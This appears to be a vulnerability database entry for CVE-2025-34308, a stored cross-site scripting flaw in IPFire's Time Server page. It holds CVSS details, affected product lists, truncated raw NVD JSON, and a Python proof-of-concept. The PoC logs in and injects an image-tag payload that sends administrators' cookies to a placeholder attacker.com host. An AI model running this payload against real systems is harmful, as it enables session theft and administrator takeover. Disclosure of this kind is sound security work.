Security Vulnerability Report
中文
CVE-2025-34308 CVSS 5.4 MEDIUM

CVE-2025-34308

Published: 2025-10-28 15:16:11
Last Modified: 2025-11-03 17:01:52
Source: [email protected]

Description

IPFire versions prior to 2.29 (Core Update 198) contain a stored cross-site scripting (XSS) vulnerability that allows an authenticated attacker to inject arbitrary JavaScript code through the UPDATE_VALUE parameter when updating the default time synchronization settings. When the default values displayed on the Time Server page are updated, the application issues an HTTP POST request to /cgi-bin/time.cgi, and the synchronization value is provided in the UPDATE_VALUE parameter. The value of this parameter is stored and later rendered in the web interface without proper sanitation or encoding, allowing injected scripts to execute in the context of other users who view the affected Time Server configuration page.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ipfire:ipfire:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ipfire:ipfire:2.29:core_update183:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ipfire:ipfire:2.29:core_update184:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ipfire:ipfire:2.29:core_update185:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ipfire:ipfire:2.29:core_update186:*:*:*:*:*:* - VULNERABLE
IPFire < 2.29 (Core Update 198)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re # CVE-2025-34308 PoC - IPFire Stored XSS in time.cgi # Target: IPFire < 2.29 Core Update 198 TARGET = "http://target-ipfire:444/cgi-bin/time.cgi" USERNAME = "admin" PASSWORD = "password" def login(session, target, username, password): """Authenticate to IPFire web interface""" login_url = f"{target.replace('/cgi-bin/time.cgi', '')}/cgi-bin/login.cgi" data = { 'username': username, 'password': password } response = session.post(login_url, data=data, timeout=10) return 'login' not in response.url or response.status_code == 200 def exploit_stored_xss(session, target): """Inject XSS payload via UPDATE_VALUE parameter""" # XSS payload - steals admin cookies xss_payload = '<img src=x onerror="fetch(`https://attacker.com/steal?c=`+btoa(document.cookie))">' data = { 'UPDATE_VALUE': xss_payload, 'submit': 'Update' } response = session.post(target, data=data, timeout=10) return response.status_code == 200 def main(): session = requests.Session() print("[*] Logging into IPFire...") if not login(session, TARGET, USERNAME, PASSWORD): print("[-] Authentication failed") return print("[+] Authentication successful") print("[*] Injecting stored XSS payload...") if exploit_stored_xss(session, TARGET): print("[+] XSS payload injected successfully") print("[*] Payload will execute when admin visits Time Server page") else: print("[-] Injection failed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34308", "sourceIdentifier": "[email protected]", "published": "2025-10-28T15:16:11.080", "lastModified": "2025-11-03T17:01:51.640", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IPFire versions prior to 2.29 (Core Update 198) contain a stored cross-site scripting (XSS) vulnerability that allows an authenticated attacker to inject arbitrary JavaScript code through the UPDATE_VALUE parameter when updating the default time synchronization settings. When the default values displayed on the Time Server page are updated, the application issues an HTTP POST request to /cgi-bin/time.cgi, and the synchronization value is provided in the UPDATE_VALUE parameter. The value of this parameter is stored and later rendered in the web interface without proper sanitation or encoding, allowing injected scripts to execute in the context of other users who view the affected Time Server configuration page."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.29", "matchCriteriaId": "9A0A85D3-A192-4FD9-9510-99D85BCF334A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update183:*:*:*:*:*:*", "matchCriteriaId": "A39350F9-D6D9-49A5-88BC-C5489AA6038C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update184:*:*:*:*:*:*", "matchCriteriaId": "CDDC0CEB-073B-41A0-8A52-4DAAAD77AA6D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update185:*:*:*:*:*:*", "matchCriteriaId": "745640B9-2180-48C3-82CC-D6E73AAF95D5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update186:*:*:*:*:*:*", "matchCriteriaId": "08006D41-7288-4333-83FE-B6FD7CD5C779"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update187:*:*:*:*:*:*", "matchCriteriaId": "15EE4FEE-62AB-4172-B898-19DE6F50B7AC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update188:*:*:*:*:*:*", "matchCriteriaId": "5B0ECE9B-DD45-40E1-842A-0B0B1786187E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update189:*:*:*:*:*:*", "matchCriteriaId": "9B9BDB00-A750-4053-8812-5A3854042CB4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update190:*:*:*:*:*:*", "matchCriteriaId": "16F654D7-CC82-4428-BBEF-1110CAE75597"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update191:*:*:*:*:*:*", "matchCriteriaId": "FFCC61A9-AF1B-4F8A-98D2-FB7854AF0EF6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update192:*:*:*:*:*:*", "matchCriteriaId": "7A66DC97-E88F-455E-B688-88BCC95E861B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update193:*:*:*:*:*:*", "ma ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.